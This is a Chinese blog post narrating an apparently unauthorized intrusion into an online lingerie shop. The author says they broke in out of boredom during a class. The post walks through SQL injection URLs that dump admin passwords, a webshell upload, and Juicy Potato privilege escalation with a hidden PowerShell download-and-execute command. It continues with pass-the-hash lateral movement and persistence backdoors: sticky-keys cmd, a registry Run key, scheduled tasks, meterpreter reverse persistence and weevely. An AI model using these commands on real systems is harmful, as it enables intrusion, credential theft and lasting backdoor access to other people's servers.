文章很水,被學校強迫去上syb創業指導課,同桌上課難耐,人多又不敢去p站看考研視頻,只能逛逛這些nei衣店緩衝一下,於是就有了下文
0x01 SQL注入
這站真大,不對,這站真圓.php的站隨便隨便一測
一枚注入
因為只能讀取32位所以使用substring分開讀取 https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20# https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20#
舒服了,這下可以給光明正大的進去選內衣了
0x02 拿shell
看看robots.txt
inurl:a.com admin
進入後臺發現是ECSHOP 這裡原本是file改為image繞過
似乎不行被重置了
這裡發現可以執行sql語句而且存在絕對路徑洩露
ok下面就好說了,寫入一句話
0x03 提權
權限有點小低
存在mysql也沒其他可以利用的
嘗試mysql提權
除了目錄不能上傳其他條件都滿足所以當我沒說,上cs,powershell上線
提權這裡使用Juicy Potato 具體可以參考三好學生文章 選擇想要的任何CLSID,連結
然後我們在以system權限執行powershell
shell style.exe -p "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('powershell地址'))\"" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}這裡面的雙引號記得轉義
0x04 橫向滲透
為工作組環境,掃出來0.9也是一臺web這裡hash傳遞直接拿下,繼續抓hash,目前以有如下帳戶 wiseadmin shopaccount mysql wiseadmin filetransfer demoadmin WDAGUtilityAccount
平平無奇hash傳遞--
一個應該是web的的一個demo,然後0.7可能是資料庫伺服器
都是admin權限了如果想要獲取system的話可以使用SelectMyParent,其實也就是j把新進程當中system進程的子進程,這裡就用cs的馬,先查看winlogon.exe的pid
可以看到這裡為500
然後把我們的systen.exe上傳,執行shell SelectMyParent.exe systen.exe 500
這步操作其實就是湊點字數 ,哈哈哈哈
0x05 權限維持
這裡就拿本機測試了
粘滯鍵後門 在windows上連續按5次「Shift」,就可以調出粘滯鍵
粘滯鍵指的是電腦使用中的一種快捷鍵,專為同時按下兩個或多個鍵有困難的人而設計的。粘滯鍵的主要功能是方便Shift等鍵的組合使用。粘滯鍵可以先按一個鍵位(如shift),再按另一鍵位,而不是同時按下兩個鍵位,方便某些因身體原因而無法同時按下多鍵的人。一般的電腦連按五次shift會出現粘滯鍵提示
使用如下命令
cd windows\system32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe如果目標機是 winvista 以上的,即 winvista 以後出的系統,修改 sethc 會提示需要 trustedinstaller 權限,所以想要繼續,那就需要修改所有者為Administrator,並修改其權限:
然後修改為完全控制
現在我們連續按下5次shift就彈出一個system權限的cmd
註冊表注入後門 在普通用戶權限下,攻擊者將會需要執行的後門程序或者腳本路徑寫到註冊表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 鍵值可以任意設置,或者直接執行如下命令添加啟動項 REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe" 當管理員重新登錄系統時,就會執行後門程序
計劃任務後門
命令:schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1以上的命令會在每小時執行一次shell.exe,在win7及以下的系統使用at命令代替schtasks
meterpreter後門
meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A 自動啟動一個匹配的exploit / multi / handler來連接到代理 -L 如果未使用%TEMP%,則在目標主機中寫入有效負載的位置。-P 有效負載使用,默認為windows / meterpreter / reverse_tcp。-S 作為服務自動啟動該木馬(具有SYSTEM權限) -T 要使用的備用可執行模板 -U 用戶登錄時自動啟動該木馬 -X 系統引導時自動啟動該木馬 -h 這個幫助菜單 -i 每次連接嘗試之間的時間間隔(秒) -p 運行Metasploit的系統正在偵聽的埠 -r 運行Metasploit監聽連接的系統的IP缺點是容易被殺毒軟體查殺,然後它就在目標機新建一個vbs文件,然後每次自動啟動他
web後門的話可以使用weevely 這裡生成一個shell.php來測試
將文件放入伺服器目錄下,然後執行
weevely http://192.168.220.1/shell.phpshell 可以help查看幫助
audit.etcpasswd | 枚舉/etc/passwd audit.userfiles | 列舉用戶/home下具有權限的文件 audit.mapwebfiles | 枚舉任意Web站點的URL連結 shell.php | 編寫php文件 shell.sh | 編寫系統腳本 system.info | 收集系統信息 find.suidsgid | 查找SUID / SGID文件和目錄 find.perms | 查找權限可讀/寫/可執行文件和目錄 backdoor.tcp | TCP埠後門 backdoor.reversetcp | 反彈TCP連接 bruteforce.sql | 爆破指定資料庫用戶名密碼 bruteforce.sqlusers | 爆破所有資料庫用戶密碼 file.upload | 上傳本地文件 file.upload2web | 上傳二進位/ ASCII文件至目標站點文件夾並枚舉URL file.enum | 在本地詞表的書面枚舉遠程文件 file.read | 讀文件 file.rm | 刪除文件 file.check | 檢查遠程文件的狀態(md5值,大小,權限等) file.download | 下載遠程二進位/ ASCII文件到本地 sql.console | 啟動SQL控制臺 sql.dump | 備份資料庫,即脫庫net.scan | 埠掃描net.phpproxy | 安裝遠程php代理 net.ifaces | 顯示遠程主機網絡接口信息 net.proxy | 安裝隧道通信代理執行一些windows命令
執行自帶命令
點讚 在看 轉發
原創投稿作者:一寸一葉